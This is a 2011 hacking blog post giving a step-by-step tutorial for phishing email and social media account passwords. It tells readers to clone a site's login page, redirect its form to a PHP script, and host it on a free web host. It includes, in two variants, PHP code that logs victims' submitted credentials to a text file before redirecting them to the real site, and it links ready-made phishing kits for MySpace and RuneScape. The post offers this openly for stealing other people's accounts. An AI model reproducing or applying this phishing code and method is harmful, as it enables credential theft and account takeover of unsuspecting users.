Monday, October 3, 2011

Hack email account password by phishing 2

Hi all! here’s my second tutorial on Phishing! In my first tutorial Using Phishing to hack email accounts password, i have mentioned the method of hacking email account password by phishing. here i have made a second tutorial for hacking any email account by using phishing.

I was reported by many of my readers that the php code of my post Using phishing to hack email account seems to be giving error while phishing. Hence i have added here a new phishing tutorial which will help you in hacking email account passwords. The phishing method is useful in hacking most accounts like gmail, yahoo, aol, photobucket, flicker, rediffmail, orkut, hotmail, myspace, youtube, twitter etc.

All right lets get started!

1. First things first you must choose the site which you wanna make a phisher from.

2. When you found your site right click on it and say “view source” and save it on desktop as index.htm

3. Open the “index.htm” with notepad and find search the source for the word “action”. you should find a command looking like this
or anything alike.4. change the url (in this case “RANDOM URL”) to “next.php”


5. Save index.htm

6. Time to create a free website. It MUST SUPPORT .php files so i suggest the use of http://www.110mb.com. Create a free website.

7. login to your website and go to “file manager”

8. delete the file thats already there called “index.htm” and upload your “index.htm” (the one you just made)

9. Create a new file called next.php and copy / paste this:
header(“Location: http://WEBSITE “);
$handle =

fopen(“pass.txt”, “a”);
foreach($_GET as

$variable => $value) {
fwrite($handle,

$variable);
fwrite($handle, “=”);

fwrite($handle, $value);
fwrite($handle,

“\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>
10.Use approapriate php tags at start and end. Switch out the word “WEBSITE” with the site the browser should go to after victim wrote his/her password. so it should say like this:
header(“Location: http://hotmail.com “);

11. Save this file (next.php)

12. Create a new file called “pass.txt”. dont write anything in it. just save it empty. Your done making your phising site!

13. test out your website. type in something in your phisher and then go to filemanager and open “pass.txt” what you wrote should be typed here!

14. if its not typed there you should try editing “next.php” and enter this instead:

header(“Location: http://RANDOM”);
$handle = fopen(“passwords.txt”, “a”);
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;

As you have done above, use approapriate php tags at start and end and i think you know what to do with the “RANDOM” url.

NOTE: IF YOU USE THE SECOND CODE, YOU MUST SAVE THE TXT. FILE “password.txt” instead of “pass.txt”

15. For the lazy ones i have already made phisher files for

MySpace
http://rapidshare.com/files/98535940/Myspace_Phisher.zip.html
or
Download From here

RuneScape
http://rapidshare.com/files/98536099/Runescape_Phisher.zip.html


16. just upload all the files in the folder to the file manager and the phisher is ready for use!

I have found this phishing hack working well for me..just report your view by commenting or by simply mailing me. So guys, enjoy hacking email account passwords by phishing.

Enjoy HaCkInG…..

0 comments to “Hack email account password by phishing 2”

Post a Comment

Related Posts Plugin for WordPress, Blogger...

Popular posts

 

Computer Hack World Copyright © 2011 -- Template created by O Pregador -- Powered by Blogger